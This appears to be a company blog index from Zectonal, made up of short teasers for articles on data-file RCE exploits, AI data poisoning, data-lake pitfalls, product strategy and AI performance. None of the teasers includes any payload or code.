In this article, we demonstrate and describe how a single intentionally formatted text string inside a densely packed big data file (e.g., malicious payload) containing millions of other valid data points was used to trigger a Remote Code Execution (“RCE”) exploit.
Polluted Data Lakes are becoming an increasingly significant problem resulting in AI Bias and Data & AI Poisoning security vulnerabilities.
Learn about 7 critical pitfalls to avoid while working with your data and the latest innovations from Zectonal to help discover them through our innovative data monitoring software
In an ever-increasingly crowded ecosystem of software applications in every conceivable market, it is no longer viable to compete solely on functional differentiators.
One of the more impactful publications that resonates these past twelve months is Marc Andreessen’s call to action via “It’s Time To Build.” His call to action in the immediate aftermath of the coronavirus garnered much attention. The broader call to action to keep building is still important almost a year later.
Poorly performing AI cannot predict correctly, it cannot classify correctly, it is vulnerable from a cybersecurity perspective, it is not durable or reliable, and it’s outcomes lead to bad decision-making. What is even more concerning is that it is difficult for most organizations to diagnose or quantify AI performance.